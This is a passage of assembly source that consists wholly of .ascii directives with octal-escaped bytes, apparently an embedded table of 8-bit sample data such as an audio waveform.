"\022\025\022\027\034\032\025\023\021\017\021\015\010" .ascii "\014" .ascii "\023\024\021\026\036 \"$%')(#\"%# #'(*/4457752.))%\035" .ascii "\031\035\036\031\030\037%(,28AGEDIG<51*\"\035\027\020" .ascii "\020\021\014\011\014\014\007\004\001\371\360\352\342" .ascii "\331\325\324\324\327\336\343\350\361\374\002\005\014" .ascii "\024\027\026\026\027\030\030\025\021\023\030\027\021" .ascii "\022\027\024\017\016\017\015\014\010\002\000\000\372" .ascii "\361\357\357\350\342\343\342\336\337\340\337\337\340" .ascii "\336\333\335\333\325\322\323\321\313\311\312\313\312" .ascii "\313\314\317\324\331\331\332\341\346\343\340\342\342" .ascii "\336\333\326\323\323\323\317\314\321\326\323\322\330" .ascii "\332\331\331\331\330\330\331\326\325\331\333\331\335" .ascii "\344\346\346\353\360\361\361\362\361\361\361\355\351" .ascii "\351\353\350\344\347\356\360\360\366\375\003\011\016" .ascii "\022\030!%$(..*+,*)*'&))%',)&()%$$#\"#\"!$(&%,0//36" .ascii "64200.'\"%%!\036#'&&())*'$#$\035\030\031\027\020\015" .ascii "\015\010\003\001\374\365\361\355\343\335\335\333\326" .ascii "\327\333\334\335\341\345\351\357\365\367\376\010\016" .ascii "\020\026 %&(+,+'!\033\030\022\007\002\000\374\365\361" .ascii "\363\361\355\355\355\353\354\353\350\350\353\350\343" .ascii "\345\350\344\341\343\344\342\342\342\337\337\337\333" .ascii "\326\327\327\322\315\315\316\314\314\315\317\322\326" .ascii "\327\330\335\343\343\342\345\351\350\346\346\345\343" .ascii "\341\336\331\327\330\323\316\320\323\317\315\322\324" .ascii "\324\326\331\332\335\337\336\336\343\345\342\342\350" .ascii "\353\351\352\357\361\363\366\367\370\374\375\372\372" .ascii "\377\000\377\000\004\010\012\016\023\026\035!#$),+)" .ascii ",+(&&#! \035\033\034\036\030\033\032\033%\037\017*'" .ascii "$\027+!\011%\025\037!\020\004%*/'//+\037\0157\031\037" .ascii "\"\377A#\013>\026\0330\036\034!\032\026\030\013\371" .ascii "\007\004\365\335\331\336\335\330\337\340\322\345\332" .ascii "\341\340\366\374\377\375\000\024\004\027\031\031\034" .ascii "*;U7?S/=?<>.+*\020\016\005\006\360\340\350\357\356\367" .ascii "\375\350\347\357\345\332\351\337\341\346\355\355\354" .ascii "\373\375\372\001\004\006\007\002\005\355\365\352\334" .ascii "\372\354\335\354\332\333\333\311\311\312\320\323\347" .ascii "\351\343\340\325\317\330\335\335\346\345\360\345\333" .ascii "\350\343\333\346\343\340\353\360\350\355\343\350\343" .ascii "\323\357\337\354\362\323\335\330\307\331\323\326\346" .ascii "\346\354\354\354\334\340\355\373\377\011\021\005\011" .ascii "\013\002\000\020\017\015\027#\"\037\"\035\030\027\033" .ascii "\030! \026\011\007\000\363\007\370\374\017\001\000\375" .ascii "\355\363\370\356\367\004\013\005\014\005\377\007\002" .ascii "\015\033(...7/(%*)#&\037\037\014\001\366\353\367\357" .ascii "\360\374\352\345\344\327\335\327\323\335\330\335\350" .ascii "\347\335\335\346\354\367\003\020\024\034\032\032\023" .ascii "\033\033\023#(*\"($\027\021\022\026\034\037\037\033" .ascii "\026\023\005\010\013\015\034\027\026\036\023\023\014" .ascii "\007\013\017\025\027\027\032\016\005\007\003\003\001" .ascii "\016\007\006\010\374\367\356\360\353\353\370\375\370" .ascii "\367\366\360\354\355\357\364\373\372\376\375\367\373" .ascii "\366\356\374\377\006\017\013\015\013\007\376\375\004" .ascii "\003\002\004\003\375\361\354\347\340\343\347\347\350" .ascii "\352\346\330\322\322\320\323\332\345\353\354\357\361" .ascii "\366\371\373\013\023\035-*-2+)*,.11)$\033\022\010\005" .ascii "\011\004\003\005\005\377\372\365\361\363\374\004\011" .ascii "\017\022\026\021\017\022\025\031\034#*$\"\035\023\022" .ascii "\020\012\015\021\017\010\002\376\367\364\363\365\370" .ascii "\374\375\373\373\370\363\357\361\367\374\374\376\376" .ascii "\370\361\353\350\347\352\352\350\350\346\340\327\320" .ascii "\320\320\321\331\334\337\342\336\334\332\334\341\345" .ascii "\354\364\371\370\372\373\372\372\375\001\010\017\022" .ascii "\015\012\011\006\003\004\013\020\023\024\023\017\014" .ascii "\010\002\002\010\010\004\004\002\370\355\347\341\340" .ascii "\337\336\337\336\333\325\316\314\315\320\321\331\342" .ascii "\345\345\345\346\347\353\361\367\377\007\011\007\005" .ascii "\004\000\374\377\002\003\001\000\370\360\351\340\330" .ascii "\332\333\332\333\331\330\324\317\316\317\325\335\343" .ascii "\347\353\360\356\351\353\357\362\366\376\005\006\005" .ascii "\003\000\000\003\005\007\016\024\021\014\013\011\005" .ascii "\004\011\015\023\032\030\026\026\024\022\022\031!#%" .ascii "(&!\037\035\033!(*,/-'###$')(&\"\032\023\021\021\017" .ascii "\021\025\027\024\017\014\010\010\011\013\022\030\034" .ascii "\033\027\030\027\024\025\034\"%('\"\036\032\023\021" .ascii "\024\025\020\013\007\375\357\345\337\332\331\332\331" .ascii "\331\332\327\322\322\327\334\343\356\370\000\004\007" .ascii "\012\016\025\035%0;?>=;733332.$\032\022\010\377\375" .ascii "\377\376\373\372\370\362\355\352\350\354\362\370\371" .ascii "\374\000\374\367\370\374\377\003\011\015\016\014\010" .ascii "\000\376\376\374\373\377\001\373\365\356\350\343\341" .ascii "\342\344\351\354\353\350\346\345\341\341\347\354\360" .ascii "\362\363\361\355\351\347\346\352\360\362\363\364\363" .ascii "\355\347\346\346\346\351\354\353\353\351\342\334\335" .ascii "\337\341\346\355\361\362\362\360\356\360\365\370\375" .ascii "\007\014\013\012\014\014\014\017\025\034!%%#\"\037\033" .ascii "\033\037!\036\035\033\025\014\005\001\377\376\377\375" .ascii "\373\373\366\357\353\355\356\357\364\372\375\376\377" .ascii "\376\377\003\010\014\023\033\036\034\033\033\027\024" .ascii "\024\024\023\022\016\006\376\371\361\350\346\346\344" .ascii "\341\337\333\326\322\316\313\314\320\322\322\324\327" .ascii "\326\324\326\333\340\345\353\361\365\370\370\366\370" .ascii "\375\376\000\006\013\013\011\011\010\006\006\010\011" .ascii "\014\017\015\012\011\010\004\001\004\006\005\006\005" .ascii "\002\377\375\371\370\372\374\374\373\375\373\367\365" .ascii "\364\364\365\367\367\367\370\366\362\356\356\356\354" .ascii "\354\356\356\354\352\347\343\343\343\342\344\350\353" .ascii "\352\351\353\355\354\357\364\370\374\000\377\377\000" .ascii "\377\373\372\375\374\371\367\365\360\351\344\340\334" .ascii "\334\332\326\326\326\323\317\320\323\325\330\337\345" .ascii "\354\361\366\372\000\007\014\021\031 $%'(''''&'$ \035" .ascii "\033\026\021\021\022\021\020\021\020\017\017\016\015" .ascii "\020\025\026\026\032\034\032\031\031\032\032\033\034" .ascii "\034\035\035\031\025\026\026\024\023\025\026\025\024" .ascii "\023\022\022\021\020\021\023\024\021\020\021\017\013" .ascii "\011\012\012\010\007\005\002\001\376\371\367\367\366" .ascii "\363\362\362\360\354\353\353\352\354\356\357\360\364" .ascii "\365\364\365\371\372\373\000\003\005\011\012\013\014" .ascii "\020\022\023\027\034\035\035\037!!!\"#%''%%%!\035\034" .ascii "\034\031\025\023\020\013\007\002\376\373\372\366\363" .ascii "\364\364\361\356\360\361\361\362\365\367\372\374\375" .ascii "\375\377\002\001\003\007\010\007\010\010\007\005\005" .ascii "\003\002\003\002\377\374\373\371\365\363\362\361\360" .ascii "\356\355\354\354\352\347\347\351\351\350\350\352\352" .ascii "\350\347\350\350\351\353\354\356\361\363\363\365\372" .ascii "\374\375\001\006\010\012\015\016\017\022\023\022\026" .ascii "\032\031\030\032\034\032\030\031\031\031\032\031\027" .ascii "\027\027\025\023\025\026\024\024\026\026\025\025\025" .ascii "\024\024\025\023\022\023\023\020\015\015\014\012\010" .ascii "\010\007\006\006\004\002\003\003\001\001\003\005\004" .ascii "\004\006\006\006\007\007\007\011\013\010\010\012\010" .ascii "\004\002\002\377\372\367\364\357\353\346\337\334\331" .ascii "\326\321\321\322\320\317\320\323\325\330\334\341\346" .ascii "\354\361\365\373\001\005\010\016\024\027\031\034\036" .ascii "\036\036\035\034\032\033\027\023\022\020\014\007\006" .ascii "\004\001\377\376\373\373\373\370\365\367\370\365\365" .ascii "\366\367\365\365\364\363\363\364\362\361\363\363\361" .ascii "\360\361\361\357\356\357\360\360\357\356\357\357\357" .ascii "\356\356\361\361\360\360\362\361\357\357\357\356\355" .ascii "\354\352\351\351\347\343\343\343\341\337\337\340\337" .ascii "\336\337\335\336\337\337\335\337\342\341\340\343\344" .ascii "\344\346\350\351\354\357\360\361\364\367\370\371\375" .ascii "\000\002\004\007\012\015\017\021\022\026\031\030\031" .ascii "\034\036\034\032\033\033\030\026\025\023\020\016\012" .ascii "\007\006\004\000\376\000\376\373\373\374\373\374\375" .ascii "\375\376\001\003\002\005\010\010\007\011\014\014\014" .ascii "\014\014\013\013\012\007\006\006\004\001\000\377\374" .ascii "\372\371\367\366\365\364\361\361\360\356\352\351\350" .ascii "\345\342\341\340\336\334\332\331\331\332\332\332\335" .ascii "\341\342\343\351\355\357\363\371\375\002" .ascii "\007\012\015\022\026\026\027\033\035\033\033\034\033" .ascii "\030\027\024\022\021\016\013\011\011\006\003\002\002" .ascii "\001\377\377\377\377\377\000\377\377\000\000\377\377" .ascii "\000\377\375\374\374\372\370\367\365\364\363\361\356" .ascii "\355\357\355\352\352\354\352\353\354\360\361\366\366" .ascii "\371\372\000\377\000\002\006\375\356\363\366\015\325" .ascii "\311\370\036\003$f\025\362\375#\002\372\366\0236\364" .ascii "+\001\315 \024\375\024(:\011\360.\357\273\340\347\026" .ascii "<\372\366\033\365\337\253\253\314\362\037!\006\026\010" .ascii "\375\376\345\362\346\341\305\316\305\274\313\255\305" .ascii "\324\313\301\311\361\354\347\365\323\312\320\256\302" .ascii "\270\302\314\321\364\321\356\365\341\336\326\342\012" .ascii "\346\340\007\365\017\007$\"5B\027+*>L;><\030.+\365\006" .ascii "\035\035\015$\030$<\020\021\015'TXML-A$\030#\005\036" .ascii "\001\336\352\370\334\356\344\343\011'\013\374\010\006" .ascii "\007\370\344\351\371\334\331\327\327\336\001\321\342" .ascii "\363\351\013\007\000\017\016\374\371\355\004\365\015" .ascii "\363\330\364\032(?2\037H>.16\"/\035\375\024$&\034\355" .ascii "\375\034\023\017\036\023\003\023\370\0107&0;\03399(" .ascii "\017\353\014\376\377\007\373\024(\033\012)/RQ+\024)" .ascii "'\000\363\320\320\304\307\330\327\320\373\357\317\340" .ascii "\355\352\346\335\272\333\315\303\271\246\261\265\301" .ascii "\305\312\330\352\337\352\333\344\006\366\341\347\363" .ascii "\354\337\336\316\313\360\361\361\002\035(-\031\021\037" .ascii "--\016\0312(\020\012\357\366\001\362\356\377\017\024" .ascii "\017\017%,ST=N?76\013\012!\000\364\352\352\357\362\344" .ascii "\326\343\367\020\000\367\370\377\361\351\340\310\357" .ascii "\377\335\340\356\360\000\371\344\375\000\002\372\355" .ascii "\370\346\356\344\323\340\361\351\354\335\337\014\001" .ascii "\377\374\024 &3\026\033\031\032\003\367\015\"\037\011" .ascii "\025&5J6/@?TUMQVP>\031.:#)\015\036(#+\"/,:!\032/\033" .ascii "\372\343\332\326\335\330\346\346\357\001\015\373\002" .ascii " \004\007\010\363\004\377\356\352\334\363\013\007\002" .ascii "\011$!\030\031\001\024\026\372\343\340\350\332\317\305" .ascii "\262\276\327\310\302\274\312\320\314\346\346\346\360" .ascii "\354\340\330\346\351\333\325\301\326\350\324\331\330" .ascii "\337\365\352\355\006\017\030\005\366\374\005\027\005" .ascii "\357\370\003\003\370\003\002\010\032\037**17\026\375" .ascii "\000\376\376\367\355\346\374\005\357\004\032\037D1+" .ascii "EBD#\022\022\371\375\360\313\323\326\337\335\334\357" .ascii "\006\013\372\376\016\036\032\017\367\367\371\372\354" .ascii "\335\363\370\347\341\356\354\362\003\367\360\033\020" .ascii "\025\011\355\373\000\371\352\342\345\361\353\352\332" .ascii "\357\016\005\005\021\017! \012\373\023\027\006\007\375" .ascii "\026\015\001\000\001\0271D<FSPZ='6$\014\013\377\002" .ascii "\007\372\002\003\023'\037\035\036\034\037\007\367\371" .ascii "\000\377\375\371\356\001\022\000\374\003\027+&0./72" .ascii "'&8>/,\025\030&\377\002\003\011\031\011\001\374\001" .ascii "\010\362\345\350\340\343\322\276\273\300\274\264\271" .ascii "\304\305\341\335\316\331\327\347\322\311\323\333\320" .ascii "\307\273\256\303\305\267\275\302\316\351\326\325\340" .ascii "\351\351\332\325\340\341\336\322\277\325\320\326\346" .ascii "\320\326\355\354\343\345\366\363\363\365\365\001\012" .ascii "\024\004\364\003\024\022\376\003\017\017\035\020\007" .ascii "\032\024\023\020\005\031 \036\014\002\025\031\034\032" .ascii "\031+5239DGO:/A<)\030\024\017\025\021\024\022\0334)" .ascii "&)896&\027,#\021\007\373\375\003\000\376\370\012\026" .ascii "\020\014\014\030\037\020\006\011\010\005\376\370\351" .ascii "\367\013\005\001\004\015\021\371\001\377\374\001\361" .ascii "\354\331\352\341\322\320\300\315\315\264\272\270\266" .ascii "\306\267\270\304\324\353\346\352\354\353\367\350\344" .ascii "\360\373\372\372\377\010\023\"&!3@N<-72\036\023\011" .ascii "\004\011\010\370\000\005\005\036\004\005\027\024\032" .ascii "\024\012\020\013\010\372\355\374\366\363\361\354\361" .ascii "\373\011\376\376\023\027\025\023\015\011\007\375\364" .ascii "\353\366\373\370\355\360\367\371\007\367\372\004\376" .ascii "\013\006\357\374\367\356\343\320\330\324\323\311\305" .ascii "\327\343\343\351\371\372\007\015\001\374\375\363\343" .ascii "\333\317\326\331\317\313\303\305\324\333\331\340\360" .ascii "\356\367\361\354\374\357\354\356\353\357\367\356\355" .ascii "\366\376\006\006\014\013\020\031\016\003\007\013\377" .ascii "\376\376\360\373\374\373\370\364\376\006\007\020\026" .ascii "\036#\035\027\024\035\023\023\016\004\011\020\012\013" .ascii "\017\017\035$$(/74335</# %\037\023\023\020\022\031\031" .ascii "\030\037%%\027\017\014\005\365\346\342\326\332\340\325" .ascii "\347\363\355\010\012\015# '$!&$% \036!!).,.3:/16,(\034" .ascii "\021\013\006\375\367\355\353\351\347\344\344\354\354" .ascii "\370\353\355\373\357\360\361\345\341\333\327\333\317" .ascii "\316\320\316\315\317\327\331\331\331\334\330\335\341" .ascii "\331\326\333\330\322\322\317\317\305\310\307\305\315" .ascii "\325\335\332\333\335\324\334\330\313\323\314\307\310" .ascii "\302\310\314\304\317\325\337\346\343\352\350\351\360" .ascii "\351\345\347\344\335\337\337\330\333\340\336\344\356" .ascii "\372\005\005\017\016\027\032\032\034\027 \025\020\027" .ascii "\016\024\034\020\036\036\037,&-201-,+*) \032 \"\037" .ascii "\034 *&,00//.*/./*)%#)*'+/2?<=:580+' \027\012\005\010" .ascii "\002\003\005\001\001\007\001\371\367\361\352\343\341" .ascii "\341\337\337\346\342\341\343\351\354\356\370\373\376" .ascii "\007\011\013\023\021\031\037\031\" \035\036\025\022" .ascii "\023\022\012\007\007\004\000\374\367\370\366\367\362" .ascii "\351\352\350\336\326\324\323\320\316\321\316\322\324" .ascii "\326\324\330\337\326\334\336\327\332\327\324\327\314" .ascii "\317\322\315\324\325\324\325\323\326\325\330\337\332" .ascii "\326\330\332\325\325\326\320\321\327\330\327\335\341" .ascii "\336\334\334\334\341\343\343\345\340\345\343\341\346" .ascii "\337\344\350\336\346\347\344\347\342\345\355\362\363" .ascii "\367\371\367\371\377\002\006\011\020\025\023\033\031" .ascii "\031 \036!!&+)+)*%'&!)'\"('+.).20140/-+'(&#$\"\037\036" .ascii "#&\"!,(,0.-+-*+,0,%)&%&\035\036\034\024\027\022\010" .ascii "\011\004\374\374\363\361\352\347\340\327\333\331\330" .ascii "\331\341\342\347\354\355\357\365\366\366\370\373\001" .ascii "\376\005\010\011\013\017\030\032\033 \037\035\034\026" .ascii "\026\017\011\010\374\377\377\366\364\362\361\356\361" .ascii "\362\353\356\353\345\342\342\342\332\331\330\324\324" .ascii "\324\325\323\316\322\322\325\334\336\340\337\341\341" .ascii "\334\337\335\331\336\326\326\331\323\327\324\323\327" .ascii "\330\330\333\335\336\334\337\336\333\336\335\333\330" .ascii "\330\326\323\327\326\325\333\337\341\345\347\350\345" .ascii "\346\344\343\343\340\340\331\331\334\330\341\340\343" .ascii "\354\356\364\376\002\006\015\013\017\022\025\024\026" .ascii "\027\023\022\026\032\035$')+,.))('%& \033\035\031\033" .ascii "\031\031\027\021\001\016\033\365\036\3668#\361\011\370" .ascii "\012\310%T4\032\337\364\026\347\334\357\342\346\315" .ascii "\351\363\324%\001\356\367\321\027\035\310\015J\"9\035" .ascii "\356\310\310\317\343\310\243\304\337\274\275\341\364" .ascii "\344\335\334\352\347\0063*\377\027T6;(+$\373\341\362" .ascii "\337\361\326\363\314\222\255\255\271\237\262\326\331" .ascii "\265\323\354\017\026&.A>RA+\0270L+.\014\022\012\370" .ascii "\350\372\016\036\035\036\360\365\014\362\333\330\010" .ascii "\034\334\340\355\333\344\326\325\302\310\357\365\306" .ascii "\327\321\001\027\"\026\030=;DCRG2A6\0072G(\354\377\024" .ascii "\015\007\347\363\374\367\015\001\346\346\373\005\367" .ascii "\372\022\024\002\372\007:<(\033\032\010\011\032\371" .ascii "\350\371\374\365\351\015\372\000\031\020\036-7\021\364" .ascii "\345\343\345\011\005\362\334\343\365\360\330\360\343" .ascii "\335\326\261\341\345\366\376\333\345\025&:1\035#0\"" .ascii "$\017\012\367\033\015\013\033\365!\022\000\377@3\011" .ascii "\375\016\023&\014\020\020\370\373\322\336\323\342\333" .ascii "\273\241\241\300\322\260\263\262\275\303\326\346\322" .ascii "\332\357\005\002\034 G\033\017\"\031:\022\027\007" .ascii "\022\024\012\027\342\326\330\346\331\315\333\354\345" .ascii "\323\337\372\011\014\030\013\006\025\032\361\350\343" .ascii "\342\336\307\321\315\331\337\323\362\377\013\034\026" .ascii "\035\374\0257@0\0136?,%\025-\003\000\033\016\031\027" .ascii "\034\012\375\007&&\034\002\016\036%'\022\021\000\365" .ascii "\011\372\342\365\330\321\320\333\354\357\334\330\345" .ascii "\373\006\031\036\030\035-V@KTeeGVgO0)\023\007\013\006" .ascii "\374\333\323\340\361\345\341\345\356\342\327\347\306" .ascii "\334\277\301\312\333\337\333\371\322\321\350\002\366" .ascii "\352\364\357\374\004\015\035\030\035(2+?\\S!63-0\017" .ascii "\022\010\002\000\005\357\353\345\361\357\344\357\370" .ascii "\366\357\346\364\366\364\366\356\330\325\336\333\317" .ascii "\303\302\270\310\253\310\312\301\303\272\323\335\356" .ascii "\366\371\361\374\013.!\027/\033\037\032)&\011\017\032" .ascii "\032\003\015\003\351\323\305\327\345\337\330\327\353" .ascii "\353\367\377\014\014\376\026\010\003\370\366\363\335" .ascii "\307\317\324\336\307\305\332\326\361\374\000\373\005" .ascii "\015\030\026\"%/\035\021#2$\031\015\006\025\0352\006" .ascii "\016\032((%+47 %6:4(\027\016\010\031\030\375\342\344" .ascii "\345\342\340\336\321\337\330\345\356\346\003\376\375" .ascii "\004\025!9:0<FL?>3\034\036\026\026\003\365\374\360\345" .ascii "\362\015\022\377\363\363\021\015\364\377\347\336\344" .ascii "\366\373\373\364\374\366\350\341\364\003\360\347\347" .ascii "\357\377\367\376\020\357\003\020\"\027\026\030\376\361" .ascii "\370\004\374\365\341\335\342\353\364\370\350\347\364" .ascii "\005\014\014\010\032\"\021\031%#(\024\021\017\370\006" .ascii "\000\356\333\342\351\350\333\317\320\317\317\326\337" .ascii "\340\342\345\341\343\363\003\370\351\345\330\355\360" .ascii "\346\326\320\332\303\324\337\304\272\276\275\274\300" .ascii "\314\327\316\323\347\002\021\032\032\025\022\027#(\022" .ascii "\014\024\366\366\372\014\014\373\367\001\015!\037\027" .ascii "&\016!>4# \036\034\024\015\017\007\371\360\361\350\362" .ascii "\366\365\366\337\362\001\017\010\375\031\031 \031\022" .ascii "\011\015\014\011\030\025\020\011\370\352\366\004\012" .ascii "\377\372\371\005\016\033 \034&.>G<W]OWK\\J<'\035!\030" .ascii "\033\006\366\355\357\371\361\350\361\356\345\331\331" .ascii "\334\321\315\310\303\307\323\344\326\324\321\330\364" .ascii "\340\343\354\351\371\364\370\374\013\032\025\030\025" .ascii "'64#\030\030\030\014\006\001\371\362\363\364\371\365" .ascii "\356\372\357\371\011\023\022\030\026\034,\033('\035" .ascii "\012\011\376\361\366\345\360\335\316\327\332\327\307" .ascii "\301\307\320\322\332\330\326\326\337\355\355\342\344" .ascii "\353\351\344\345\357\354\352\344\335\306\325\323\303" .ascii "\305\253\306\317\303\316\321\340\337\353\375\002\015" .ascii "\012\014\007\014\013\021\016\366\362\374\001\004\002" .ascii "\015\022\010\027\035$\031$+& *;& \026&- \027\023\017" .ascii "\007\007\010\007\001\006\014\010\004\020\027\030\017" .ascii "\015\025 \027\034\030\013\024\000\020\003\351\000\365" .ascii "\362\360\347\363\357\361\345\355\377\014\017\007\030" .ascii "\027)876@D?;;8.'\034\030\016\025\017\005\002\372\002" .ascii "\006\007\366\376\375\355\355\346\363\345\343\332\352" .ascii "\354\357\010\363\364\362\007\011\001\000\005\010\015" .ascii "\017\024\024\023\033\034 \025\030\031\026\000\367\375" .ascii "\366\342\341\323\325\314\324\340\321\323\325\336\334" .ascii "\341\337\365\373\355\367\005\377\003\373\367\371\363" .ascii "\371\366\356\345\351\353\347\340\340\351\355\341\343" .ascii "\361\363\370\000\004\375\377\027\014\017\016\012\036" .ascii "\032\015\015\011\002\007\363\360\353\347\342\336\332" .ascii "\324\333\334\332\325\335\345\346\350\351\352\351\351" .ascii "\352\345\342\342\342\336\322\321\337\343\346\336\342" .ascii "\356\356\366\372\003\000\011\015\004\010\007\012\012" .ascii "\377\371\007\006\373\377\003\004\012\023\025\023\020" .ascii "\033&'%*4532=<>>5.17-\037\026\031 \030\006\011\014\027" .ascii "\025\015\034\027\031$$-+5?78663\"\037\027\012\007\001" .ascii "\372\355\352\353\344\331\325\333\334\312\304\305\277" .ascii "\300\277\272\273\275\306\323\327\327\330\346\354\350" .ascii "\360\001\011\015\014\012\024\026\027\034 \037\"(*\027" .ascii "\031 \026\021\010\014\011\002\376\375\373\373\377\001" .ascii "\374\370\005\015\017\013\011\016\031\015\015\026\024" .ascii "\015\007\002\377\370\366\374\345\353\347\350\343\337" .ascii "\347\352\351\333\343\342\345\356\366\364\357\356\371" .ascii "\371\363\361\364\370\364\355\353\353\344\341\337\332" .ascii "\321\320\316\316\305\301\321\333\314\314\323\337\335" .ascii "\335\337\331\350\337\345\333\333\343\350\354\335\345" .ascii "\353\373\373\367\010\016\016\017\021\021\017\035$\035" .ascii "\027\025\035\034\027\025\031\032\030\030\033\031\036" .ascii "#'*\",75206?3336610\" &%\030\015\015\016\007\001\377" .ascii "\014\020\015\022\013\020\025 #\035\"%)%\034 \030\020" .ascii "\012\005\377\372\365\363\344\341\346\340\325\320\314" .ascii "\321\304\267\275\274\303\302\303\313\315\327\335\337" .ascii "\346\353\374\370\376\000\002\012\022\023\027 \033))" .ascii "\"\036%$\032\024\024\023\020\005\001\003\000\000\376" .ascii "\377\375\375\005\011\002\003\012\020\024\010\016\025" .ascii "\017\015\011\020\005\006\000\001\370\356\363\363\355" .ascii "\336\346\344\351\341\337\354\364\351\353\356\355\366" .ascii "\365\374\372\375\377\004\376\365\370\375\376\360\360" .ascii "\356\350\345\342\333\321\321\325\325\314\312\320\326" .ascii "\321\323\325\331\331\327\337\333\330\340\342\342\336" .ascii "\342\352\351\350\353\370\372\376\004\376\003\011\002" .ascii "\015\016\000\010\024\022\006\003\013\017\013\012\021" .ascii "\021\022\025\031\030\033\037\"\037\034%.*'%,21G1;3\016" .ascii " \026\007'\027\354\365\011\014\361\343\347\372\014\036" .ascii "7;/CB.O;2D\021#\025\374\035\367\016\031\353\033*\021" .ascii "\377\003\014\354\345\332\305\306\313\273\245\253\316" .ascii "\305\312\340\337\002\032\034\372\373\030\012\007\004" .ascii "\021\026\011\376\371\357\021\017\017\030\351\036+\026" .ascii "\021\004\014\024\004\350\336\354\343\322\320\277\343" .ascii "\360\374\364\363\030\025\007\375\013\012\006\005\000" .ascii "\356\364\365\336\310\306\334\346\354\316\324\372\373" .ascii "\360\363\362\004\007\361\363\374\364\366\364\336\345" .ascii "\376\026\013\010\015\016\031\015\015\030\024\016\003" .ascii "\364\372\362\342\330\307\307\322\351\331\324\361\375" .ascii "\007\377\005\007\021\011\363\366\371\365\364\356\344" .ascii "\373\372\007\006\004\035\036(\025\030--&\023\014\003" .ascii "\377\374\363\344\355\006\004\374\005\036#%\036'*'%\023" .ascii "\027\017\007\016\367\355\005\010\007\375\377\021\031" .ascii "\012\004\010\027\026\006\376\357\372\371\362\337\343" .ascii "\375\020\012\006\030'4*!%=5\032\011\003\001\004\365" .ascii "\333\342\360\350\344\335\330\365\364\342\336\345\355" .ascii "\361\351\326\330\344\351\344\331\335\363\002\003\366" .ascii "\012(3*'6@E8+ \")\023\375\006\032\027\003\376\011$%" .ascii "\024\025\033\034%\023\377\000\001\014\370\352\347\370" .ascii "\003\364\355\374\016\021\016\004\003\014\014\370\336" .ascii "\333\343\330\316\301\307\334\340\322\326\340\364\375" .ascii "\370\372\372\006\013\376\362\362\356\365\341\322\333" .ascii "\350\346\335\333\346\363\363\354\350\353\351\345\322" .ascii "\313\311\311\307\275\270\302\315\315\311\320\350\360" .ascii "\366\364\375\007\011\017\005\000\001\004\002\364\354" .ascii "\374\002\375\373\376\020\033\035\025\034 \032\012\005" .ascii "\006\022\007\370\371\013\025\015\015\027.43/4B>6$\033" .ascii " \036\013\370\365\006\004\372\373\001\025\035\031\027" .ascii "\035&-\"\024\021\"$\024\010\013\036\037\030\025\036" .ascii "14)#\"('\024\371\362\370\362\331\304\307\323\323\311" .ascii "\305\320\347\360\352\356\363\375\014\376\357\361\001" .ascii "\004\364\353\366\011\021\014\013\032,4.''/2 \006\004" .ascii "\012\005\355\340\345\360\361\352\353\366\007\015\012" .ascii "\005\010\022\025\001\362\361\366\361\337\323\333\344" .ascii "\343\335\334\347\357\366\357\351\354\364\362\345\330" .ascii "\331\335\332\314\305\320\333\336\331\343\367\001\005" .ascii "\010\004\011\016\014\373\362\356\357\344\317\313\325" .ascii "\334\323\317\322\340\350\352\344\347\362\362\360\343" .ascii "\331\340\343\330\314\317\340\350\347\352\365\013\027" .ascii "\032\034\036*,%\026\021\030\030\007\371\376\015\016" .ascii "\010\007\021#)&$)39-\035\034&#\023\005\013\033\034\025" .ascii "\024 082))34!\014\011\022\013\365\351\356\000\001\375" .ascii "\372" .ascii "\010\034\"%!%68'\027\026$\033\007\371\374\011\010\373" .ascii "\371\001\012\017\005\375\370\377\375\346\324\315\325" .ascii "\314\270\262\267\312\312\313\321\337\364\000\002\000" .ascii "\011\032 \023\012\014\026\021\002\374\003\014\015\010" .ascii "\011\021\033\037\031\023\023\032\025\002\364\365\370" .ascii "\357\340\335\345\355\355\354\362\374\010\015\011\007" .ascii "\015\022\014\374\362\361\360\343\322\315\327\330\324" .ascii "\323\331\346\355\356\353\356\366\375\367\352\346\355" .ascii "\357\344\331\337\355\362\354\353\367\003\013\012\005" .ascii "\007\014\015\001\356\345\352\347\320\302\305\317\321" .ascii "\311\310\324\345\355\354\352\357\374\004\371\354\355" .ascii "\373\373\356\345\360\000\006\001\002\020 *&#&15'\026" .ascii "\025\034\031\010\374\001\015\017\013\013\025%.,(,7;" .ascii "-\036\034% \017\005\012\022\023\016\014\022\033\"\036" .ascii "\031\031!#\026\007\006\012\007\374\365\372\002\010\007" .ascii "\012\023\037&&%$)+\034\017\014\015\005\363\355\357\355" .ascii "\353\344\340\345\350\354\345\343\341\344\343\330\323" .ascii "\327\330\324\320\320\334\341\346\355\367\005\017\027" .ascii "\035\037$*' \033\034\031\017\005\003\007\004\377\376" .ascii "\002\007\010\011\010\010\012\015\007\376\372\375\373" .ascii "\361\350\354\362\362\357\360\367\376\003\002\000\377" .ascii "\003\003\372\355\351\352\346\330\317\322\331\330\325" .ascii "\330\337\351\356\361\363\365\377\005\376\370\366\374" .ascii "\374\362\352\354\363\360\354\354\357\365\371\364\357" .ascii "\357\360\360\350\331\325\330\326\311\304\306\320\321" .ascii "\320\326\333\351\360\370\371\374\006\015\013\005\007" .ascii "\020\015\010\004\007\013\015\016\020\024\030 ! \034" .ascii "\"#\036\022\021\024\022\014\010\012\016\020\023\026" .ascii "\032 %+((+,%\035\031\030\021\012\006\006\004\002\004" .ascii "\007\010\012\017\022\022\022\025\026\022\017\020\020" .ascii "\014\010\013\015\015\015\020\026\027\031\033\034\031" .ascii "\026\025\020\010\000\373\364\350\340\336\333\326\322" .ascii "\322\325\330\333\336\342\345\353\361\361\357\361\372" .ascii "\374\370\372\000\011\014\015\023\032\037%(()),$\033" .ascii "\030\027\023\006\000\001\002\377\375\376\002\004\010" .ascii "\012\010\011\013\017\012\002\000\004\000\367\364\365" .ascii "\367\365\363\362\363\367\372\371\365\364\366\370\362" .ascii "\351\351\353\350\340\335\340\344\346\350\353\357\364" .ascii "\374\001\376\376\004\007\002\372\370\371\364\356\347" .ascii "\346\344\342\341\340\335\336\342\342\336\332\335\337" .ascii "\333\324\324\326\325\322\324\327\333\340\350\355\363" .ascii "\371\004\013\014\017\024\030\025\022\022\021\016\014" .ascii "\014\013\010\011\014\016\014\015\022\024\023\023\024" .ascii "\026\022\017\021\016\014\012\015\015\013\015\021\024" .ascii "\024\025\030\032\030\027\026\023\015\012\011\002\374" .ascii "\372\372\372\367\370\374\001\001\004\007\013\016\021" .ascii "\024\021\016\021\024\017\011\010\013\011\006\003\005" .ascii "\004\004\002\000\374\367\367\363\352\342\340\336\327" .ascii "\316\316\320\321\321\324\331\336\344\356\364\367\376" .ascii "\007\015\015\015\023\031\030\026\027\032\034\034\035" .ascii 